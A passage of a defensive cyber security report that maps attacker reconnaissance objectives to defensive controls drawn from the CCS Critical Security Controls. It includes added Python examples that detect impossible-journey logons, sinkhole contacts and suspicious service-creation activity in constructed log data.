There are a number of well-defined frameworks and methodologies for information security including the soon to be updated ‘ISO/IEC 27001:2005 – Information technology – Security techniques – Information security management systems – Requirements’. Currently there are fewer for cyber security but this is being addressed by standards bodies and many new standards such as ‘PAS 555:2013 Cyber security risk. Governance and management Specification’ will address this area more specifically.

A mature controls framework for cyber defence is published by the Council on CyberSecurity (CCS), the CCS Critical Security Controls [10]. The framework covers twenty controls that attempt to directly address the risks associated with cyber-attacks. In this section we review the use of these controls to address the latter stages of targeted attacks.

There are also a number of specific tactics and techniques that extend the CCS Critical Security Controls across the spectrum of defensive capabilities that we discuss. We will extend the concepts described in the CCS Critical Security Controls with specific tactics and techniques that have been shown to have value in addressing the latter stages of attacks.

5.1 CATEGORIES OF DEFENSIVE CAPABILITY

There are a large number of controls, tactics and techniques organisations can deploy in order to defeat a cyber adversary or attacker. These can be categorised by the type of capability they offer as has previously been well understood in military information operations doctrine [11]. The categories of defensive capabilities useful to discuss in the cyber domain include:

Detect: To discover or discern the existence, presence, or fact of an intrusion by an adversary into your information systems.

Deny: To prevent the adversary from accessing and using your critical information, systems, and services.

Disrupt: To break or interrupt the flow of information to and from the adversary to your information systems.

Degrade: To reduce the effectiveness or efficiency of adversary command and control or communications systems, and information collection efforts. Organisations can also reduce the target’s worth or value, or reduce the quality of adversary decisions and actions and in so doing degrade the adversary’s priorities and capabilities.

Deceive: To cause an adversary to believe what is not true. This can allow opportunities to hide targets, to redirect adversaries to low value or sacrificial systems and to encourage adversaries to expose their priorities and tactics.

Destroy: To disable your information systems or communications network such that the adversary can no longer use it to achieve their goals.

Table 11: The categories that defensive capabilities fall into and a brief description of each category


In the past, traditional IT security solutions, such as AV, have focused on internal protection and control relying on Detect and Deny capabilities. These remain critical but are no longer the only capabilities that should be considered by network defenders. The necessary shift in focus from the internal protection and control, to the adversary or attacker has brought other types of capability such as Disrupt, Degrade and Deceive into consideration.

There has been concern about the legality of activities in these categories which has meant that Disrupt, Degrade and Deceive capabilities have been discounted by many organisations. This is because of the nature of cyber-attacks, for example, an attack might involve servers located in many countries – all of which have different laws in the cyber domain. However, whilst some techniques do exist in a legal grey-area, there are some established tactics and techniques for Disrupt, Degrade and Deceive capabilities being deployed by leading cyber security organisations without legal challenge.

5.2 ATTACK & DEFENCE CONTROLS MATRIX

The following table maps the attacker actions described in the ‘Internal network reconnaissance’ section to the defensive capabilities described above to highlight the utility of different controls and specific tactics and techniques in defeating attacks that are in the lateral movement stage of the BAE Systems Kill Chain.

Adversary objective: Identify key environment information
Detect: Log Analysis, Behavioural Analytics, Threat Intelligence, Network Monitoring
Deny: Network Filtering
Disrupt: DNS Redirect, Incident Response
Degrade: Sinkhole
Deceive: –
Destroy: Disconnect

Adversary objective: Download of additional tools to collect environment information
Detect: Software Inventory, Malware Defences, Log Analysis, Network Monitoring, Behavioural Analytics
Deny: Software Inventory, Malware Defences, Web Separation
Disrupt: Malware Defences, Incident Response
Degrade: QoS Limits
Deceive: Honeypot
Destroy: Disconnect

Adversary objective: Elevate privileges to collect environment information
Detect: Log Analysis, Account Monitoring
Deny: System Lock-Down, Vulnerability Management, Malware Defences, Network Device Lock-Down, Privileged User Management
Disrupt: Incident Response
Degrade: –
Deceive: Honeypot
Destroy: Power Down

Adversary objective: Lateral movement relying on environment information
Detect: Account Monitoring, Threat Intelligence, Network Monitoring
Deny: System Lock-Down, Network Device Lock-Down, Network Filtering, Network Diode, Web Separation
Disrupt: Incident Response
Degrade: Sinkhole
Deceive: Honeypot
Destroy: Disconnect

Adversary objective: Stage environment information for exfiltration
Detect: DLP, Behavioural Analytics
Deny: Data Classification & Control, DLP
Disrupt: Incident Response
Degrade: QoS Limits
Deceive: Honeypot
Destroy: Disconnect

Table 12: Matrix of Network Reconnaissance Objectives against Defensive Capabilities


5.3 CONTROLS, TACTICS & TECHNIQUES – DEFINITIONS

The following describes the controls, tactics and techniques identified in the table above. Wherever possible the relationship of these controls to the CCS Critical Security Controls is highlighted.

5.3.1 TAKEN FROM CCS TOP 20 CRITICAL CONTROLS

These security measures are those which directly adhere to the CCS top 20 Critical Security Controls Version 4.1 [10]. All sub-controls within each section apply to the measures identified below.

5.3.1.1 Account Monitoring

impersonate legitimate users by exploiting legitimate but inactive user accounts. This control also incorporates the detection of malicious insiders or former employees who attempt to access accounts left behind in a system long after contract expiration.

Account Monitoring is the following CCS Critical Security Control:

• Critical Control 16: Account Monitoring

This control enables organisations to detect attackers abusing accounts. This can include monitoring for accounts which have not been used in a long time, as well as monitoring for ‘Impossible Journeys’ (where the same account is in use in two places at the same time where it couldn’t be) for example.
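An added example, not from the report, of the two checks this control describes, run over constructed logon records: the ‘impossible journey’ test, using an assumed table of minimum travel times between sites, and a dormant-account check against an assumed last-seen table. Account names, sites and times are constructed.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Logon:
    account: str
    when: datetime
    site: str   # office or region the logon came from, as resolved by the log source


# Minimum plausible travel time between sites (assumed values for this example)
MIN_TRAVEL = {
    frozenset({"London", "Manchester"}): timedelta(hours=2),
    frozenset({"London", "New York"}): timedelta(hours=8),
    frozenset({"Manchester", "New York"}): timedelta(hours=9),
}
DORMANT_AFTER = timedelta(days=90)


def impossible_journeys(logons):
    """Consecutive logons for one account from two sites closer in time than travel allows."""
    by_account = defaultdict(list)
    for logon in logons:
        by_account[logon.account].append(logon)
    findings = []
    for account, events in by_account.items():
        events.sort(key=lambda e: e.when)
        for earlier, later in zip(events, events[1:]):
            if earlier.site == later.site:
                continue
            needed = MIN_TRAVEL.get(frozenset({earlier.site, later.site}))
            if needed is None:
                continue  # unknown site pair: cannot judge, leave for the analyst
            gap = later.when - earlier.when
            if gap < needed:
                findings.append((account, earlier.site, later.site, gap))
    return findings


def dormant_account_use(logons, last_seen, threshold=DORMANT_AFTER):
    """Accounts whose first logon in this window follows a silence longer than threshold."""
    first_use = {}
    for logon in sorted(logons, key=lambda e: e.when):
        first_use.setdefault(logon.account, logon)
    findings = []
    for account, logon in first_use.items():
        previous = last_seen.get(account)
        if previous is not None and logon.when - previous > threshold:
            findings.append((account, logon.when - previous))
    return findings


# Constructed logon records and last-seen table (not real data)
SAMPLE_LOGONS = [
    Logon("jsmith", datetime(2013, 3, 12, 8, 55), "London"),
    Logon("jsmith", datetime(2013, 3, 12, 9, 40), "New York"),   # 45 minutes after London
    Logon("mlee", datetime(2013, 3, 12, 9, 0), "Manchester"),
    Logon("mlee", datetime(2013, 3, 12, 14, 0), "London"),       # 5 hours later: plausible
    Logon("svc_old", datetime(2013, 3, 12, 3, 12), "London"),    # account silent since October
]
LAST_SEEN = {
    "jsmith": datetime(2013, 3, 11, 18, 0),
    "mlee": datetime(2013, 3, 11, 17, 30),
    "svc_old": datetime(2012, 10, 1, 12, 0),
}

if __name__ == "__main__":
    for account, origin, destination, gap in impossible_journeys(SAMPLE_LOGONS):
        print(f"{account}: {origin} -> {destination} in {gap}")
    for account, silence in dormant_account_use(SAMPLE_LOGONS, LAST_SEEN):
        print(f"{account}: first use after {silence.days} days idle")
```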

5.3.1.2 Boundary Defence

Boundary Defence is the control that prevents attackers gaining an initial foothold on the network through use of multi-layered protection mechanisms such as firewalls, proxies and IPS. The control ensures that attention can then be directed only at those attacks which are capable of circumventing boundary defences.

Boundary Defence is the following CCS Critical Security Control:

• Critical Control 13: Boundary Defence

5.3.1.3 Incident Response

Incident Response is the control that provides the resources and processes to manage attacks and responses to attacks. A fast and effective response both limits damage and limits attacker effectiveness.

Incident Response is the following CCS Critical Security Control:

• Critical Control 18: Incident Response and Management

This control allows organisations to react appropriately to incidents on their estate, and to minimise the damage resulting from incidents.

5.3.1.4 Malware Defences

Malware Defences is the control that provides detection, prevention and removal of malicious software from the network or environment.

Malware Defences is the following CCS Critical Security Control:

• Critical Control 5: Malware Defences

By ensuring malware defences are in place, organisations can hinder the tools that attackers can use initially, as there is a chance that existing defences will catch tools used. For example, some anti-virus providers will detect password dumping tools, meaning attackers have to take an extra step (i.e. disabling the anti-virus), or use other (less effective) tools.

5.3.1.5 Network Device Lockdown


Network Device Lockdown is the control that provides secure configuration and reduced attack surfaces for network devices such as network switches, routers and firewalls.

Network Device Lockdown is the following CCS Critical Security Control:

• Critical Control 10: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches

This control enables organisations to defend against simple malware, for example malware which communicates on obscure TCP ports. By restricting both inbound and outbound connectivity to that which has a business case, organisations can narrow an attacker’s options.

5.3.1.6 Vulnerability Management

Vulnerability Management is the control that monitors, detects, prevents and corrects vulnerabilities in the defended environment.

Vulnerability Management is the following CCS Critical Security Control:

• Critical Control 4: Continuous Vulnerability Assessment and Remediation

By ensuring vulnerabilities are kept in check, organisations can make lateral movement for attackers more difficult.

5.3.1.7 System Lock-Down

System Lock-Down is the control that ensures endpoints, mobile devices and servers are configured to reduce their attack surface.

System Lock-Down is the following CCS Critical Security Control:

• Critical Control 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptop, and Servers

By employing this control organisations can minimise opportunities for an attacker to both attack and to increase privileges once they have attacked.

5.3.1.8 Software Inventory

Software Inventory is the control that manages a list of known and approved software within the organisation. It also provides a whitelist capability which is a simple list of applications that have been allowed for a user by an administrator. When an application tries to execute, it is automatically checked against the list and, if found, allowed to run.

Software Inventory is the following CCS Critical Security Control:

• Critical Control 2: Inventory of Authorised and Unauthorised Software

Keeping and enforcing a software inventory makes it very difficult for attackers to infiltrate, but also makes it difficult for them to use other tools following successful infiltration as it is likely to restrict them to the tools that already exist on the victim machine, hindering their progress.

5.3.1.9 Data Loss Prevention (DLP)

DLP is a solution that inhibits the leaking of critical data by inspecting data in transmission and when moved to portable storage devices and enforcing clear security rules.

DLP is the following CCS Critical Control:

• Critical Control 17: Data Loss Prevention

Using a DLP solution to inspect data being transmitted across internal network boundaries may allow an organisation to detect environment information being staged for exfiltration. This will require customisation of the DLP solution to look for critical environment information such as password hashes or IP addresses.


5.3.2 TAKEN FROM CCS TOP 20 CRITICAL CONTROLS SUB CONTROLS

These security measures align with selected sub controls of the CCS top 20 Critical Controls.

5.3.2.1 Data Classification & Control

Data Classification and Control is the control that ensures critical assets are identified and rated and access to those assets is limited to a ‘need to know’ rule.

Data Classification & Control is the following CCS Critical Security Control Sub control:

• Critical Control Sub control 15.2: Establish a multi-level data identification/classification scheme (e.g., a three- or four-tiered scheme with data separated into categories based on the impact of exposure of the data).

By ensuring data is classified appropriately organisations will be able to make it more difficult for attackers to find the data they are looking for, increasing the amount of reconnaissance they must undertake.

5.3.2.2 DNS Redirect

DNS Redirect is a tactic that replaces Domain Name Service Internet Protocol address records for key attacker infrastructure with IP address records for systems controlled by the defender. This denies remote command and control capabilities to the attacker.

DNS Redirect corresponds to the following CCS Critical Security Control Sub controls:

• Critical Control Sub control 19.3: Visibility/Attribution: Deploy domain name systems (DNS) in a hierarchical, structured fashion, with all internal network client machines configured to send requests to intranet DNS servers, not to DNS servers located on the Internet. These internal DNS servers should be configured to forward requests they cannot resolve to DNS servers located on a protected DMZ. These DMZ servers, in turn, should be the only DNS servers allowed to send requests to the Internet.

• Critical Control Sub control 5.15: Enable domain name system (DNS) query logging to detect hostname lookup for known malicious C2 domains

Being able to cut off an attacker’s communication with victim machines is crucial; by employing DNS redirect tactics organisations are able to react quickly. Note that this responsive measure should only be used when a live security incident is wholly understood.

5.3.2.3 Log Analysis

Log Analysis is the control that collects, normalises and analyses system and network logs for security events. This provides a measure of situational awareness both of current attacks and for analysing the events from a historical attack.

Log Analysis is the following CCS Critical Security Control Sub control:

• Critical Control Sub control 14.10: Deploy an SIEM (security incident management/security event management) or log analytic tools for log aggregation and consolidation from multiple machines and for log correlation and analysis. Using the SIEM tool, system administrators and security personnel should devise profiles of common events from given systems so that they can tune detection to focus on unusual activity, avoid false positives, more rapidly identify anomalies, and prevent overwhelming analysts with insignificant alerts.

Log analysis will allow for the detection of most actions that take place during internal network reconnaissance.

5.3.2.4 Network Filtering

Network Filtering is the control that enforces that only legitimate network traffic is allowed between, from and to business systems. The legitimacy of network traffic is determined by the organisation’s security policy and security architecture design.

Network Filtering corresponds to the following CCS Critical Security Control sub controls:

• Critical Control Sub control 10.4: Network filtering technologies employed between networks.

This control should restrict lateral movement of attackers.


5.3.2.5 Network Monitoring

Network monitoring is a technique that encompasses the collection of both meta-data and data from network traffic in order to attempt to identify malicious traffic. This data can then be analysed both through Log Analysis and Behavioural Analytics in order to identify security relevant events and patterns of behaviour.

Network Monitoring corresponds to the following CCS Critical Security Controls sub controls:

• Critical Control Sub control 13.2: On DMZ networks, configure monitoring systems (which may be built in to the IDS sensors or deployed as a separate technology) to record at least packet header information, and preferably full packet header and payloads of the traffic destined for or passing through the network border. This traffic should be sent to a properly configured SIEM or log analytics system so that events can be correlated from all devices on the network.

• Critical Control Sub control 13.4: Deploy network-based IDS sensors on Internet and extranet DMZ systems and networks that look for unusual attack mechanisms and detect compromise of these systems. These network-based IDS sensors may detect attacks through the use of signatures, network behaviour analysis, or other mechanisms to analyse traffic.

• Critical Control Sub control 13.14: Deploy netflow collection and analysis to DMZ network flows to detect anomalous activity.

• Critical Control Sub control 14.5: Verbosely log all remote access to a network, whether to the DMZ or the internal network (i.e., VPN, dial-up, or other mechanism).

• Critical Control Sub control 14.11: Advanced: Carefully monitor for service creation events. On Windows systems, many attackers use psexec functionality to spread from system to system. Creation of a service is an unusual event and should be monitored closely.

Without this control neither the Log Analysis nor the Behavioural Analytics controls can take place – it is also key for incident response.

5.3.2.6 Privileged User Management

Privileged User Management is the control that strictly limits access to privileged user accounts to a small group of key administrators whose access is handled under change control and closely monitored. Emergency access to critical accounts by unprivileged users or administrators who don’t normally require day to day access of those accounts is allowed by a ‘break-glass’ process that provides both alerts and accounting records that must later be reconciled.

Whilst the control is focussed heavily on Critical Control 12: Controlled Use of Administrative Privileges, the following sub control matches this strongly as well:

• Critical Control Sub control 3.3: Limit administrative privileges to very few users who have both the knowledge necessary to administer the operating system and a business need to modify the configuration of the underlying operating system. This will help prevent installation of unauthorised software and other abuses of administrator privileges.

As discussed in the case studies, one of the primary goals of attackers is to elevate their privileges on victim networks; by managing the users who have privileged access organisations can make it more difficult for attackers to do this.

5.3.3 SPECIALIST TACTICS AND TECHNIQUES

These security measures do not map directly to the CCS top 20 critical controls or their sub controls, but there is occasionally some overlap. These measures extend and improve upon the existing CCS controls, by offering specific measures or capabilities that organisations should invest in to defend their networks.

5.3.3.1 Web Separation

Web Separation is a technique where the Internet web browser is separated from the user desktop environment, often by the use of virtualisation and remote desktop tools and is itself hosted in a demilitarised zone.

This is commonly deployed with a Data Import / Export Gateway in order to allow Internet based files to be imported to the defended environment.

Web Separation is an extension of the following CCS Critical Security Controls sub controls:


• Critical Control Sub control 13.10: To limit access by an insider or malware spreading on an internal network, devise internal network segmentation schemes to limit traffic to only those services needed for business use across the organization’s internal network.

• Critical Control Sub control 19.1: Design the network using a minimum of a three-tier architecture (DMZ, middleware, and private network). Any system accessible from the Internet should be on the DMZ, but DMZ systems should never contain sensitive data. Any system with sensitive data should reside on the private network and never be directly accessible from the Internet. DMZ systems should communicate with private network systems through an application proxy residing on the middleware tier.

This control makes it very difficult for attackers to find the files they are looking for. Typically the network architecture employed in conjunction with such a solution means that attackers are essentially placed on their own ‘mini network’ making it very difficult for them to achieve any of their objectives.

5.3.3.2 Behavioural Analytics

Behavioural Analytics is the application of big data and data mining techniques to identify suspicious patterns of behaviour from network traffic and endpoint activity.

Behavioural Analytics is a technique that is an extension of the following CCS Critical Security Controls:

• Critical Control 5: Malware Defences

• Critical Control 14: Maintenance, Monitoring, and Analysis of Audit Logs

• Critical Control 16: Account Monitoring and Control

Much like log analysis, Behavioural Analytics empowers organisations to detect threats throughout the Kill Chain. Once an organisation is compromised, our experience informs us that Behavioural Analytics have the best chance of any controls listed of detecting targeted attacks.

5.3.3.3 Honeypot

Honeypot is a technique where a deliberately vulnerable system is created in order to encourage an attacker to attack it. This allows the defender to spot when an attack is underway and to learn from the tactics and the tools of the attacker in order to identify the attacker elsewhere in the network or environment.

Honeypot is a technique that is an extension of the following CCS Critical Security Control:

• Critical Control 14: Maintenance, Monitoring, and Analysis of Audit Logs

By employing this technique organisations can waste the resources of attackers, and also can gain an understanding of what resources attackers are targeting, enabling them to construct better defences of those resources.

5.3.3.4 Network Diode

Network Diode is a technique that ensures a highly assured uni-directional network flow between two differently trusted networks. This is often a hardware device that physically limits the transmission of network traffic in one direction. This is a very strong separation control for protecting critical assets but can limit the utility of those assets as they are unable to directly communicate past the diode. It is not uncommon for critical data stores to be placed behind network diodes and for the users of those databases to have separate virtual or physical desktops for access to the ‘lower’ network.

Network Diode is a technique that extends the following CCS Critical Security Controls:

• Critical Control 11: Limitation and Control of Network Ports, Protocols, and Services

• Critical Control 19: Secure Network Engineering

By employing this control organisations will be able to segregate data, but still maintain access to it. This should decrease the likelihood of successful exfiltration.


5.3.3.5 Power Down

Power Down is a tactic that removes the target or intermediate systems from use by the adversary but also has the converse effect of removing them for use by legitimate users. The policies and procedures around this tactic should be well defined and exercised in advance of any serious attack.

Power Down is a tactic that is an extension of the following CCS Critical Security Control:

• Critical Control 18: Incident Response and Management

This specialist tactic highlights the requirement within an incident response program to have established procedures for powering down devices and even whole systems. This should only be done in well-defined circumstances, particularly only after an incident is wholly understood.

5.3.3.6 QoS Limits

Quality of Service (QoS) Limits is a technique that uses network quality of service enforcement in the network devices providing the network to limit bandwidth available for the transfer of large amounts of data, especially to previously unknown locations external to the organisation.

QoS Limits is a technique that extends the following CCS Critical Security Control:

• Critical Control 19: Secure Network Engineering

This can discourage large scale exfiltration of data and provides greater opportunity for a defender to spot such transfers as the limited bandwidth will likely extend the timeframe over which such transfers complete.

5.3.3.7 Sinkhole

A sinkhole (or tarpit) is a technique where a computer system is set up to very slowly respond to all attempts to communicate with it. This has the effect of significantly slowing a scan of the network. It is not uncommon for a single sinkhole to respond to a wide range of unused IP addresses. A sinkhole is also a good place to identify misconfigured or malicious network traffic as there should be no legitimate business reason to attempt to communicate with the Sinkhole.

Sinkhole is a technique that extends the following CCS Critical Security Control:

• Critical Control 19: Secure Network Engineering

This technique may disrupt attackers’ internal network reconnaissance, increasing the time that various tasks take and giving the security solutions in place longer to detect the attack.
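
The detection value of a sinkhole comes from the fact that nothing legitimate should ever talk to it. The following Python is an added illustration of that check and is not code from the report or from BAE Systems: it reads constructed flow records, flags every internal source that contacts the sinkhole range, and separates a single stray contact (likely misconfiguration) from a sweep across many sinkholed addresses (likely reconnaissance). The range 10.99.0.0/16, the addresses and the record format are assumptions.

```python
# Added example (not from the PIANOS report): flag internal hosts that touch a
# sinkhole range. Addresses and flow records below are constructed for illustration.
import ipaddress
from collections import defaultdict

# Assumption: the unused address space 10.99.0.0/16 is answered by a single tarpit host.
SINKHOLE_RANGE = ipaddress.ip_network("10.99.0.0/16")

# Constructed flow records: "timestamp src_ip dst_ip dst_port"
SAMPLE_FLOWS = """\
2013-09-01T09:00:01 10.1.4.22 10.1.4.1 53
2013-09-01T09:00:02 10.1.4.22 10.99.0.5 445
2013-09-01T09:00:02 10.1.4.22 10.99.0.6 445
2013-09-01T09:00:03 10.1.4.22 10.99.0.7 445
2013-09-01T09:00:03 10.1.4.22 10.99.1.9 3389
2013-09-01T09:00:04 10.1.7.8 10.99.3.3 80
2013-09-01T09:00:05 10.1.7.8 10.1.2.15 443
"""


def parse_flows(text):
    """Turn the constructed text records into (timestamp, src, dst, port) tuples."""
    records = []
    for line in text.splitlines():
        ts, src, dst, port = line.split()
        records.append((ts, ipaddress.ip_address(src), ipaddress.ip_address(dst), int(port)))
    return records


def sinkhole_contacts(records, sinkhole=SINKHOLE_RANGE):
    """Return {src: set(dst)} for every flow whose destination lies in the sinkhole range.
    Every entry is suspect: there is no business reason to communicate with the tarpit."""
    hits = defaultdict(set)
    for _, src, dst, _ in records:
        if dst in sinkhole:
            hits[str(src)].add(str(dst))
    return dict(hits)


def classify(hits, scan_threshold=3):
    """Sources touching at least scan_threshold distinct sinkholed addresses look like a sweep;
    the rest are reported as probable misconfiguration for follow-up."""
    return {src: ("probable scan" if len(dsts) >= scan_threshold else "misconfiguration or single probe")
            for src, dsts in hits.items()}


if __name__ == "__main__":
    contacts = sinkhole_contacts(parse_flows(SAMPLE_FLOWS))
    for src, verdict in classify(contacts).items():
        print(src, len(contacts[src]), "sinkhole addresses ->", verdict)
```

In a real deployment the flow source would be the firewall or NetFlow export, and the verdicts would feed the log analysis and incident response capabilities described in section 6.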

5.3.3.8 Threat Intelligence

Threat Intelligence is a technique that includes the collection, analysis and sharing of attacker technical and behavioural data from both within and outside of your organisation to determine the threat to your environment. There are now many useful sources of technical threat information available including both industry-led and government-led threat data-sharing schemes. This can provide the opportunity to predict attacks and in some cases spot attacks much earlier.

Threat Intelligence capabilities are not covered by existing CCS controls.

A strong threat intelligence capability should empower organisations to prioritise which areas of network defence are most at risk. By combining an understanding of previous attacks on other organisations with a good knowledge of your own existing network defences, it is possible to plan and take appropriate actions to mitigate similar attacks being successfully mounted against your own organisation.

5.3.3.9 Disconnect

Disconnect is the tactic of disconnecting key systems or segregated networks from lower trust or compromised networks and environments during an attack. This can prevent an attacker from extending their foothold into key systems. This tactic will likely dramatically reduce the utility of the disconnected systems or data to the defender and the policies and procedures around this tactic should be well defined and exercised in advance of any serious attack.

Disconnect capabilities are not covered by existing CCS controls.

This control enables businesses to continue to operate with less impact in the event of an attack.


6 RECOMMENDATIONS

In most cases it is impossible to completely deter the threat actors behind targeted attacks, and therefore organisations should assume that they will be attacked and that they will be compromised. It is therefore critical that measures are put in place to slow the progress of such attacks following successful infiltration, so that detection mechanisms have the longest possible time to detect suspicious activities. Bearing this in mind, we make the following recommendations.

Each recommendation includes a mapping of the relevant CCS Critical Security Controls Sub Controls as well as an associated commentary from BAE Systems on the controls, for use by implementers considering deployment and to feed back into the CCS Critical Security Controls development process.

6.1 CRITICAL COUNTERMEASURES

The measures in this section are ‘Critical’. This means that, as a minimum, organisations should seek to fully implement the controls recommended in this section.

6.1.1 LOG ANALYSIS

By analysing system and network logs continuously, organisations give themselves the best chance of detecting attacks whilst they are taking place. In particular, one area which is often overlooked when deploying log analysis solutions is the collection and analysis of host-based logs, which enables detection of new tools downloaded by the attacker.

It is critical that organisations deploy the right data collection systems in conjunction with market leading log analysis tools in order to minimise the effort and maximise the rewards of this control.

Log analysis can be increasingly automated and more recent tooling on the market supports this trend. However, there will always be a requirement for skilled analysts both to configure the automated processes and to provide the expert view on the probability that an automated analysis result actually represents a security incident.

Security Information and Event Management (SIEM) tools provide a strong capability for log analysis, providing a near real-time signature or rules-based detection capability to look for known threats in targeted subsets of network monitoring data that are known to contain good indicators of those threats. SIEM is also useful for compliance and reporting.

Log analysis is not primarily a technical capability, although it does require technical tools to enable it. Where the investment in skilled cyber analysts is not economic for an organisation, outsourcing this control can provide a cost-effective and high-quality option.


6.1.1.1 Relevant CCS Critical Security Control Sub Controls

Table 13: CCS Critical Security Sub Controls relevant to Log Analysis

Sub Control 14.1
Network Reconnaissance Application: The investigation of any network reconnaissance events will require consistent and synchronised logs in order to make any sense to the cyber analyst.
Commentary: This is a key foundation of log analysis, network monitoring, incident response and behavioural analysis.

Sub Control 14.6
Network Reconnaissance Application: A common indicator of network reconnaissance activity is an attempt to access multiple resources for which the attacker has not yet acquired permission.
Commentary: This usually carries a low risk of detection for the attacker, as unauthorised access attempts to environment information or repositories are rarely logged and those logs are rarely analysed.

Sub Control 14.11
Network Reconnaissance Application: A reliable indicator of network reconnaissance activity is service creation events across the environment, as the attacker attempts to enable network services to gather environment information and to conduct lateral movement.
Commentary: This usually carries a low risk of detection for the attacker, as service creation events are not normally logged and those logs are rarely analysed.

Sub Control 14.10
Network Reconnaissance Application: The use of SIEM tooling acts as a force multiplier for the network defenders by providing a platform for the automation of basic log correlation and signature analysis. If internal logs are available for analysis by a SIEM then extensive system administration type requests and environment information discovery scans can be identified.
Commentary: A SIEM is only as good as the use cases it is configured to examine, the data it has to apply those use cases to, and the cyber analysts who use the tooling to look at suspicious activity. The development of a security monitoring function incorporating log analysis and network monitoring capabilities is a wider project than this sub-control implies and is not primarily a technology issue.

6.1.2 INCIDENT RESPONSE

Having a strong incident response capability is critical to network defence. Historically, solutions have relied on the prevention of attacks and, whilst this remains key, new thinking is required. Persistent attackers are likely to infiltrate target networks given enough time, and as such companies should ensure that they either have a good incident response capability set up in house or identify a partner organisation to provide incident response services in the event of an attack.

By setting up the capability, or the relationship, in advance of an attack, organisations are best equipped to identify the extent of a compromise as quickly as possible, which can reduce the impact of compromises. If this measure is implemented poorly or not at all, the time between identification of the incident and remediation will be increased, which may lead to further data loss and potentially more expensive incident response activities.

A key part of successfully establishing an incident response capability is testing the incident response team with guided table-top cyber management exercises and adversarial technical exercises. This improves the ‘muscle memory’ of the organisation and reduces the time taken for response and decision making during real cyber crises.
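
Two of the Table 13 indicators, repeated access failures against resources the account has no permission for (14.6) and service creation spreading across hosts (14.11), are the kind of SIEM use case section 6.1.1 says must be written by an analyst. The Python below is an added example of both rules, not code from the report or from BAE Systems: it runs over constructed host events (the record layout, hosts, accounts and resource names are assumptions) and reports the accounts whose activity crosses the thresholds within a time window.

```python
# Added example (not from the PIANOS report): two SIEM-style use cases over host
# logs, matching sub-controls 14.6 (repeated access failures) and 14.11 (service
# creation across hosts). Event records are constructed; field layout is assumed.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed host events: (time, host, account, event_type, resource)
SAMPLE_EVENTS = [
    ("2013-09-01 10:00:00", "WS-017", "jsmith", "access_denied", "//FS01/finance"),
    ("2013-09-01 10:00:03", "WS-017", "jsmith", "access_denied", "//FS01/hr"),
    ("2013-09-01 10:00:05", "WS-017", "jsmith", "access_denied", "//FS02/netops"),
    ("2013-09-01 10:00:09", "WS-017", "jsmith", "access_denied", "//FS02/backups"),
    ("2013-09-01 10:02:00", "WS-017", "jsmith", "service_created", "svchelper"),
    ("2013-09-01 10:02:30", "WS-021", "jsmith", "service_created", "svchelper"),
    ("2013-09-01 10:03:10", "SRV-DB1", "jsmith", "service_created", "svchelper"),
    ("2013-09-01 11:15:00", "WS-042", "abrown", "access_denied", "//FS01/finance"),
    ("2013-09-01 12:00:00", "SRV-APP3", "svc_deploy", "service_created", "appagent"),
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def access_denied_sweeps(events, min_resources=3, window=timedelta(minutes=10)):
    """14.6: accounts denied access to at least min_resources distinct resources
    within `window`. Returns {account: sorted resources} for the first matching window."""
    by_account = defaultdict(list)
    for t, _host, acct, ev, res in events:
        if ev == "access_denied":
            by_account[acct].append((_ts(t), res))
    flagged = {}
    for acct, items in by_account.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            seen = {r for t, r in items[i:] if t - start <= window}
            if len(seen) >= min_resources:
                flagged[acct] = sorted(seen)
                break
    return flagged


def service_creation_spread(events, min_hosts=2, window=timedelta(hours=1)):
    """14.11: accounts creating services on at least min_hosts distinct hosts
    within `window`. Returns {account: sorted hosts} for the first matching window."""
    by_account = defaultdict(list)
    for t, host, acct, ev, res in events:
        if ev == "service_created":
            by_account[acct].append((_ts(t), host, res))
    flagged = {}
    for acct, items in by_account.items():
        items.sort()
        for i, (start, _, _) in enumerate(items):
            hosts = {h for t, h, _ in items[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                flagged[acct] = sorted(hosts)
                break
    return flagged


if __name__ == "__main__":
    print("access-denied sweeps:", access_denied_sweeps(SAMPLE_EVENTS))
    print("service creation spread:", service_creation_spread(SAMPLE_EVENTS))
```

Both rules depend on the events being logged in the first place; the commentary on 14.6 and 14.11 notes that they frequently are not, which is why the host-based logging recommended in 6.1.1 is the precondition for this use case.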


6.1.2.1 Relevant CCS Critical Security Control Sub Controls

Table 14: CCS Critical Security Sub Controls relevant to Incident Response

Sub Control 5.13
Network Reconnaissance Application: The ability to capture and recover any additional tools downloaded by an attacker can allow for analysis of both where the tools have come from and potentially what targets within the organisation they were used on.
Commentary: The close integration between IT and security needed to ensure tools can be captured and recovered discreetly is a challenge, especially in large distributed environments. It is impossible to introduce such a capability both discreetly and retroactively during the course of a targeted attack.

Sub Control 18.1
Network Reconnaissance Application: Once network reconnaissance has been identified there is an opportunity to reject the attacker before they have established a major foothold in the environment. Speed of response is a key characteristic during the network reconnaissance stage of the kill chain.
Commentary: The speed, accuracy and reliability of incident response, especially across large distributed environments, relies on non-specialist first responders and technology managers. By documenting the procedures they must follow, the opportunity for mistakes and dangerous ad-hoc improvisation is reduced.

Sub Control 18.3
Network Reconnaissance Application: Once network reconnaissance has been identified there is an opportunity to reject the attacker before they have established a major foothold in the environment. Speed of response is a key characteristic during the network reconnaissance stage of the kill chain.
Commentary: Key incident response decision-makers must be identified and trained. Cyber specialists are rarely in a position to make the business decisions required during a targeted attack, and business leaders are rarely well enough informed about the cyber security domain to be able to weigh up their options quickly and rationally.

Sub Control 18.7
Network Reconnaissance Application: Once network reconnaissance has been identified there is an opportunity to reject the attacker before they have established a major foothold in the environment. Speed of response is a key characteristic during the network reconnaissance stage of the kill chain.
Commentary: Incident response procedures must be exercised and tested regularly. Having a documented set of procedures is of little value if the decision-making process is ad-hoc and hesitant due to lack of experience.


6.1.3 NETWORK MONITORING

For the Incident Response capability outlined in section 6.1.2 to be effective, it is critical that high quality logs are kept so that incident responders are able to piece together past events. Similarly, for incidents to be identified, alerts relating to the detection of security events by intrusion detection systems, intrusion prevention systems and anti-virus tools must be collected, reviewed and acted upon.

Specifically we recommend that:

• Coverage of devices from which logs or alerts are collected should be as wide as possible.

